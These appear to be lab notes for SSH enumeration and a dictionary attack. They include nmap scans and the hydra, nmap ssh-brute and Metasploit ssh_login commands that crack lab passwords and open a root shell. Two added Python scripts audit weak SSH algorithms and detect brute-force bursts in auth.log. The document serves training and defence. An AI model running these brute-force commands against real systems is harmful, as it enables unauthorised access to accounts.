ssh-enum
sudo nmap -p22 -sV -sC -O <TARGET_IP>
Lab 1
ip -br -c a
# output example:
# eth1@if130369 UP 192.8.3.2/24

nmap -sV 192.8.3.3
# output:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
MAC Address: 02:42:C0:08:03:03 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nc 192.8.3.3 22
# banner returned:
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.6

ssh root@192.8.3.3 22

nmap --script ssh2-enum-algos 192.8.3.3
# output:
| ssh2-enum-algos:
|   kex_algorithms: (6)
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       ssh-rsa
|       rsa-sha2-512
|       rsa-sha2-256
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com

nmap --script ssh-hostkey --script-args ssh_hostkey=full 192.8.3.3
# output:
| ssh-hostkey:
|   ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1fkJK7F8yxf3vewEcLYHljBnKTAiRqzFxkFo6lqyew73ATL2Abyh6at/oOmBSlPI90rtAMA6jQGJ+0HlHgf7mkjz5+CBo9j2VPu1bejYtcxpqpHcL5Bp12wgey1zup74fgd+yOzILjtgbnDOw1+HSkXqN79d+4BnK0QF6T9YnkHvBhZyjzIDmjonDy92yVBAIoB6Rdp0w7nzFz3aN9gzB5MW/nSmgc4qp7R6xtzGaqZKp1H3W3McZO3RELjGzvHOdRkAKL7n2kyVAraSUrR0Oo5m5e/sXrITYi9y0X6p2PTUfYiYvgkv/3xUF+5YDDA33AJvv8BblnRcRRZ74BxaD
|   ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBB0cJ/kSOXBWVIBA2QH4UB6r7nFL5l7FwHubbSZ9dIs2JSmn/oIgvvQvxmI5YJxkdxRkQlF01KLDmVgESYXyDT4=
|_  ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKuZlCFfTgeaMC79zla20ZM2q64mjqWhKPw/2UzyQ2W/

nmap -p22 --script ssh-auth-methods --script-args="ssh.user=student" 192.8.3.3
# output:
22/tcp open ssh
| ssh-auth-methods:
|_  Supported authentication methods: none_auth

nmap -p22 --script ssh-auth-methods --script-args="ssh.user=admin" 192.8.3.3
# output:
22/tcp open ssh
| ssh-auth-methods:
|   Supported authentication methods:
|     publickey
|_    password

ssh student@192.8.3.3
# once connected:
# ls
# FLAG
# cat FLAG

nmap --script=ssh-run --script-args="ssh-run.cmd=cat /home/student/FLAG, ssh-run.username=student, ssh-run.password=" 192.8.3.3
# output:
NSE: [ssh-run] Authenticated
NSE: [ssh-run] Running command: cat /home/student/FLAG
NSE: [ssh-run] Output of command: {FLAG_content}
Nmap scan report for target-1 (192.8.3.3)
Host is up (0.000011s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcp open ssh
| ssh-run:
|   output:
|_    {FLAG_content}\x0D
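The two enumeration results that matter most in Lab 1 are the algorithm list (SHA-1 key exchange and MACs, and the SHA-1-signed ssh-rsa host key type are still offered) and the per-user authentication methods (student is accepted with the "none" method, admin allows passwords). The following script is an added example, not part of the original lab notes: it parses the nmap ssh2-enum-algos and ssh-auth-methods output pasted above and turns it into a list of hardening findings. The weak-algorithm patterns and the sample output constants are assumptions made for this example.

```python
import re

# Constructed sample: the ssh2-enum-algos output from Lab 1, embedded so the
# script runs offline against the same data the lab produced.
ENUM_ALGOS_OUTPUT = """\
| ssh2-enum-algos:
|   kex_algorithms: (6)
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       ssh-rsa
|       rsa-sha2-512
|       rsa-sha2-256
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
"""

# Constructed sample: the two ssh-auth-methods results from Lab 1.
AUTH_METHODS_OUTPUT = {
    "student": "| ssh-auth-methods:\n|_  Supported authentication methods: none_auth",
    "admin": "| ssh-auth-methods:\n|   Supported authentication methods:\n|     publickey\n|_    password",
}

# Assumed audit rules: SHA-1 based key exchange and MACs, SHA-1-signed RSA and
# DSA host key types, and legacy CBC/RC4/3DES ciphers are reported as weak.
WEAK_PATTERNS = {
    "kex_algorithms": [r"-sha1$", r"group1-"],
    "server_host_key_algorithms": [r"^ssh-rsa$", r"^ssh-dss$"],
    "encryption_algorithms": [r"-cbc$", r"^arcfour", r"^3des", r"blowfish", r"cast128"],
    "mac_algorithms": [r"sha1", r"md5", r"-96"],
}

CATEGORY_RE = re.compile(r"^(\w+): \((\d+)\)$")


def _strip_nse_prefix(line):
    # nmap prints script output as "|   text" or "|_  text" on the last line.
    return line.lstrip("|_ ").strip()


def parse_enum_algos(text):
    """Return {category: [algorithm, ...]} from ssh2-enum-algos output."""
    algos, category = {}, None
    for line in text.splitlines():
        body = _strip_nse_prefix(line)
        m = CATEGORY_RE.match(body)
        if m:
            category = m.group(1)
            algos[category] = []
        elif category and body:
            algos[category].append(body)
    return algos


def weak_algorithms(algos):
    """Return only the categories that contain an algorithm matching a weak pattern."""
    findings = {}
    for category, names in algos.items():
        patterns = WEAK_PATTERNS.get(category, [])
        weak = [n for n in names if any(re.search(p, n) for p in patterns)]
        if weak:
            findings[category] = weak
    return findings


def parse_auth_methods(text):
    """Return the method names listed by ssh-auth-methods, e.g. ['publickey', 'password']."""
    methods = []
    for line in text.splitlines():
        body = _strip_nse_prefix(line)
        if body.startswith("Supported authentication methods:"):
            rest = body.split(":", 1)[1].strip()
            if rest:  # single-line form: "...methods: none_auth"
                methods.append(rest)
        elif body and body != "ssh-auth-methods:":
            methods.append(body)
    return methods


def auth_findings(user, methods):
    """Translate the method list into findings for this user."""
    findings = []
    if "none_auth" in methods:
        findings.append(f"{user}: server accepts the 'none' method, login needs no credential")
    if "password" in methods:
        findings.append(f"{user}: password authentication enabled, exposed to dictionary attacks")
    return findings


if __name__ == "__main__":
    for cat, weak in weak_algorithms(parse_enum_algos(ENUM_ALGOS_OUTPUT)).items():
        print(f"weak {cat}: {', '.join(weak)}")
    for user, out in AUTH_METHODS_OUTPUT.items():
        for f in auth_findings(user, parse_auth_methods(out)):
            print(f)
```

Run as written it reports diffie-hellman-group14-sha1, ssh-rsa and the two hmac-sha1 MACs as weak, flags student for the "none" method and admin for password authentication; the corresponding fixes are the KexAlgorithms, HostKeyAlgorithms and MACs lines in sshd_config and PasswordAuthentication no.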
Lab 2
ip -br -c a
# output example:
# eth1@if130414 UP 192.230.83.2/24

nmap -sV 192.230.83.3
# output:
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)

gzip -d /usr/share/wordlists/rockyou.txt.gz
hydra -l student -P /usr/share/wordlists/rockyou.txt 192.230.83.3 ssh
# output:
[22][ssh] host: 192.230.83.3 login: student password: friend
1 of 1 target successfully completed, 1 valid password found

echo "administrator" > users
nmap -p22 --script=ssh-brute --script-args userdb=/root/users 192.230.83.3
# output:
| ssh-brute:
|   Accounts:
|     administrator:sunshine - Valid credentials
|_  Statistics: Performed 27 guesses in 6 seconds, average tps: 4.5

msfconsole
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.230.83.3
set USERPASS_FILE /usr/share/wordlists/metasploit/root_userpass.txt
set STOP_ON_SUCCESS true
set VERBOSE true
exploit
# output:
[+] 192.230.83.3:22 - Success: 'root:attack' 'uid=0(root) gid=0(root) groups=0(root) Linux victim-1 ...'
[*] Command shell session 1 opened ...

ssh root@192.230.83.3
# enter root password: attack
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 5.4.0-125-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
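Every guess hydra, ssh-brute and ssh_login make in Lab 2 lands in the target's sshd log as a "Failed password" line, and each hit as an "Accepted password" line from the same source. The script below is an added example, not part of the original lab notes: it parses constructed auth.log entries modelled on the Lab 2 session (hostname, PIDs, ports, timestamps and the benign 10.0.0.7 client are made up) and flags a source that crosses a failure threshold inside a time window, records which accounts were then successfully logged into from that source, and lists root password logins, which PermitRootLogin no would have prevented. The threshold and window values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample sshd entries (auth.log format) for the Lab 2 session:
# hydra against "student", ssh-brute against "administrator", ssh_login
# against "root", plus one ordinary user who mistyped a password once.
SAMPLE_AUTH_LOG = """\
Sep 12 10:00:01 victim-1 sshd[2101]: Failed password for student from 192.230.83.2 port 51001 ssh2
Sep 12 10:00:02 victim-1 sshd[2102]: Failed password for student from 192.230.83.2 port 51002 ssh2
Sep 12 10:00:02 victim-1 sshd[2103]: Failed password for student from 192.230.83.2 port 51003 ssh2
Sep 12 10:00:03 victim-1 sshd[2104]: Failed password for student from 192.230.83.2 port 51004 ssh2
Sep 12 10:00:04 victim-1 sshd[2105]: Failed password for student from 192.230.83.2 port 51005 ssh2
Sep 12 10:00:05 victim-1 sshd[2106]: Accepted password for student from 192.230.83.2 port 51006 ssh2
Sep 12 10:03:10 victim-1 sshd[2150]: Failed password for administrator from 192.230.83.2 port 51100 ssh2
Sep 12 10:03:11 victim-1 sshd[2151]: Failed password for administrator from 192.230.83.2 port 51101 ssh2
Sep 12 10:03:12 victim-1 sshd[2152]: Failed password for invalid user admin from 192.230.83.2 port 51102 ssh2
Sep 12 10:05:30 victim-1 sshd[2200]: Failed password for root from 192.230.83.2 port 51200 ssh2
Sep 12 10:05:31 victim-1 sshd[2201]: Accepted password for root from 192.230.83.2 port 51201 ssh2
Sep 12 10:20:00 victim-1 sshd[2300]: Failed password for alice from 10.0.0.7 port 40100 ssh2
Sep 12 10:20:09 victim-1 sshd[2301]: Accepted password for alice from 10.0.0.7 port 40101 ssh2
"""

# Matches the password-authentication result lines sshd writes; other sshd
# lines (session opened, disconnects, publickey events) are ignored here.
LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?P<invalid>invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+ ssh2$"
)


def parse_auth_log(text):
    """Return one event dict per password-auth result line."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # syslog timestamps carry no year; relative differences are all we need
        ts = datetime.strptime(re.sub(r" +", " ", m["ts"]), "%b %d %H:%M:%S")
        events.append({
            "ts": ts, "result": m["result"], "user": m["user"],
            "src": m["src"], "invalid_user": m["invalid"] is not None,
        })
    return events


def detect_dictionary_attack(events, threshold=5, window_seconds=60):
    """Flag sources with >= threshold failures inside window_seconds (sliding
    window per source) and record later successful logins from them."""
    recent = defaultdict(deque)  # src -> timestamps of recent failures
    flagged = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        src = ev["src"]
        if ev["result"] == "Failed":
            q = recent[src]
            q.append(ev["ts"])
            while (ev["ts"] - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged[src] = {"first_seen": q[0], "users": set(), "guessed": []}
            if src in flagged:
                flagged[src]["users"].add(ev["user"])
        elif src in flagged:
            # success from a source already in a failure burst: credential guessed
            flagged[src]["guessed"].append(ev["user"])
    return flagged


def root_password_logins(events):
    """Return (source, timestamp) for every accepted root password login."""
    return [
        (ev["src"], ev["ts"].strftime("%b %d %H:%M:%S"))
        for ev in events
        if ev["result"] == "Accepted" and ev["user"] == "root"
    ]


if __name__ == "__main__":
    evs = parse_auth_log(SAMPLE_AUTH_LOG)
    for src, info in detect_dictionary_attack(evs).items():
        print(f"{src}: burst from {info['first_seen'].strftime('%H:%M:%S')}, "
              f"users tried {sorted(info['users'])}, guessed {info['guessed']}")
    for src, ts in root_password_logins(evs):
        print(f"root password login from {src} at {ts}")
```

On the sample, 192.230.83.2 is flagged at its fifth failure, the later "student" and "root" successes are attributed to the burst, and the single alice mistake from 10.0.0.7 stays below the threshold. The same logic is what fail2ban-style tooling applies before blocking a source; the configuration-side fixes are PasswordAuthentication no, PermitRootLogin no and a low MaxAuthTries in sshd_config.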
SSH recon dictionary attack lab